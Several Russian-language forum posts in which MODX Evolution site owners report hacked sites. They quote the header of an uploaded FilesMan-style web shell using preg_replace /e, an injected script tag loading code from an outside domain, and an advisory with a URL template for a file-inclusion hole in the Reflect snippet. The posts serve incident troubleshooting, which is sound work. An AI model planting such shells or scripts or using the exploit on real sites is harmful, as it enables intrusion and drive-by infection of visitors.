Приветствую, уважаемое сообщество.
Проблема следующего содержания:

Только что мастерхост заблокировал сайт на MODX EVO 1.0.5 за массовую рассылку спама.
Злоумышленники каким-то образом умудрились загрузить скрипт рассыльщик в директорию
/assets/cache/49ea2.php — class phpmailer в нём
и /assets/cache/52120.php, его содержание:

<?php
$auth_pass = "a26f4564eb450f7887e926ea7d1926bd";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","тутдлиннющий матрас, его не буду выкладывать")

Спиппеты установленные на сайте

Ditto (10) — 2.1.0 Summarizes and lists pages to create blogs, catalogs, PR archives, bio listings and more
Jot (13) — 1.1.4 User comments with moderation and email subscription
Reflect (14) — 2.1.0 Generates date-based archives using Ditto
YAMS (16) — Yet Another Multilingual Solution Snippet
eForm (4) — 1.4.4.6 Robust form parser/processor with validation, multiple sending options, chunk/page support for forms and reports, and file uploads
MemberCheck (5) — 1.1 Show chunks based on a logged in Web User's group membership
Personalize (8) — 2.1 Personalize snippet
WebChangePwd (9) — 1.0 Allows Web User to change their password from the front-end of the website
WebLogin (12) — 1.1 Allows webusers to login to protected pages in the website, supporting multiple user groups
WebSignup (15) — 1.1 Basic Web User account creation/signup system
Breadcrumbs (1) — 1.0.3 Configurable breadcrumb page-trail navigation
FirstChildRedirect (3) — 1.0 Automatically redirects to the first child of a Container Resource
ListIndexer (6) — 1.0.1 A flexible way to show the most recent Resources and other Resource lists
UltimateParent (2) — 2.0 Travels up the document tree from a specified document and returns its «ultimate» non-root parent
Wayfinder (11) — 2.0.1 Completely template-driven and highly flexible menu builder
AjaxSearch (7) — 1.9.2 Ajax and non-Ajax search that supports results highlighting
MultiPhotos (17) — вывод фотографий

Плагины:
YAMS (7) — Yet Another Multilingual Solution Plugin
Forgot Manager Login (5) — 1.1.2 Resets your manager login when you forget your password via email confirmation
ManagerManager (6) — 0.3.9 Customize the MODx Manager to offer bespoke admin functions for end users.
MultiPhotos (8) — Добавление нескольких фотографий к странице
Quick Manager+ (1) — 1.5.5 Enables QuickManager+ front end content editing support
TinyMCE Rich Text Editor (3) — 3.3.9.2 Javascript WYSIWYG Editor
TransAlias (4) — 1.0.1 Human readible URL translation supporting multiple languages and overrides
Search Highlight (2) — 1.5 Used with AjaxSearch to show search terms highlighted on page linked from search results
innova editor 5.4 (9)

Модули: только YAMS и Doc Manager

Никто с таким не сталкивался? Где уязвимость?

UPD:
В логах MODx (Протокол событий) нашёл ошибку парсера

« MODx Parse Error »
MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
PHP error debug
Error: Unknown: open(/tmp/sess_v71eti401j8j72ciuapc9i6gu7, O_RDWR) failed: Permission denied (13)
Error type/ Nr.: Warning — 2
File: Unknown
Line: 0

UPD2:
Обнаружил на другом сайте с EVO 1.0.5 но без Basic manager тоже загруженный скрипт с классом phpmailer в папке cache

UPD3: Решение
Оказалось это была дыра в системе безопасности modx evo, решение описал Valikras http://community.modx-cms.ru/blog/news/6297.html

Один заказчиков пожаловался на то, что гугл стал считать его сайт опасным для просмотра. Заказчик утверждает что пароли доступа не могли ни куда утечь. В коде страници между тегом Head и body красуется строчка

<script src=http://warez.clickwm.ru/uploads/indexd.php ></script> 

Каким образом она могла туда попасть не понятно. В шаблоне этого нет и в теле страницы тоже. Кто ни буть сталкивался с подобными проблемами если да то какие методы решения и латания дыры?

После того, как сайты моего клиента некая банда хакеров начали ломать с определенной регулярностью — наткнулся в интернете на вот на такую вот запись:

Программа: MODx CMS 0.9.6.2, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре «reflect_base» в сценарии assets/snippets/reflect/snippet.reflect.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция «magic_quotes_gpc» должна быть отключена в конфигурационном файле PHP. Пример:

http://[host]/assets/snippets/reflect/snippet.reflect.php?reflect_base=[file]

Взято отсюда::

www.securitylab.ru/vulnerability/363800.php

И кто что по этому поводу думает?